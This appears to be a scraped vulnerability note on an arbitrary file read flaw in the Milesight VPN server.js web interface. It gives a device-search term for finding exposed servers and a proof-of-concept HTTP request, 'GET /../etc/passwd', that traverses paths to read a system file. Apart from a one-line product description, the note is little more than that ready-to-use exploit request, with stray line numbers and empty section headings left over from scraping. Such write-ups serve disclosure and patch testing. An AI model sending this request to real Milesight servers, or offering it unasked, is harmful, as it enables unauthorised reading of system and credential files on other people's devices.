Milesight Vpn Server Js Arbitrary File Reading Vulnerability
Milesight Vpn Server Js Arbitrary File Reading Vulnerability
Milesight VPN server.js arbitrary file reading vulnerability
Vulnerability Description
MilesightVPN is a software that makes the VPN channel setting process easier for Milesight products and can monitor connection status through the web server interface.
Vulnerability Impact
Milesight VPN
Network surveying and mapping
“MilesightVPN”
Vulnerability reappears
Login page
Verify POC
1
2
3
4
GET /../etc/passwd HTTP/1.1
Host:
Accept: */*
Content-Type: application/x-www-form-urlencoded
This post is licensed under CC BY 4.0 by the author.